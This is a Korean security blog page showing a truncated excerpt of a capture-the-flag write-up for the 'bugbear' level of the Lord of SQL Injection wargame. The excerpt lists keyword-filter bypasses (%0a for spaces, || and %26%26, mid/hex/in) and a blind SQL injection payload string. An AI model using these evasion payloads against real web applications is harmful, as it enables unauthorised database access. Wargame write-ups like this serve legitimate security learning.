본문 바로가기 메뉴 바로가기

https://h0pp1.github.io/

프로필사진
  • 글쓰기
  • 관리
  • 태그
  • 방명록
  • RSS

https://h0pp1.github.io/

검색하기 폼
  • 분류 전체보기 (94)
    • writeup (81)
      • webhacking.kr (8)
      • dreamhack (36)
      • hackerfactory (3)
      • LOS (29)
      • HTB (5)
    • study (11)
      • web (5)
      • pentest (6)
  • 방명록

los bugbear (1)
[Lord of SQL injection] bugbear

마흔아홉 번째 글. 1. 코드 분석 single quote, substr, ascii, =, or, and, whitespace, like, 0x... 많은 것들을 필터링하고 있었다. 이 문제 역시 온전한 pw값을 입력해야 풀린다. 2. Exploit 공백 -> %0a or -> || and -> %26%26(이 문제에서는 &&를 URL인코딩을 해줘야 된다.) substr -> mid() ascii -> hex() =,like -> in() ?no=1000%0a||%0aid%0ain(char(97,100,109,105,110))%0a%26%26%0a1%0ain(if(hex(mid(pw,인덱스,1))in(hex(비교값)),1,0))%23 점점 길어진다... import requests sess = requ..

writeup/LOS 2021. 7. 13. 23:46
이전 1 다음
이전 다음
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
TAG
  • php LFI
  • htb
  • 해커팩토리
  • dreamhack CSS Injection
  • 드림핵
  • 드림핵 DOM XSS
  • DreamHack
  • Lord of SQL injection
  • csp bypass
  • dreamhack DOM XSS
  • htb Windows Fundametals
  • 웹해킹
  • wargame
  • hack the box
  • webhacking.kr
  • blind injection
  • csp
  • dreamhack padding oracle
  • Windows Fundamentals
  • WebHacking
  • 드림핵 padding oracle
  • alasql
  • dreamhack Relative Path Overwrite
  • LFI vulnerability
  • hackerfactory
  • 드림핵 Relative Path Overwrite
  • SQL Injection
  • xxe injection
  • CSS Injection
  • dreamhack web-alasql
more
«   2025/06   »
일 월 화 수 목 금 토
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30
글 보관함

Blog is powered by Tistory / Designed by Tistory

티스토리툴바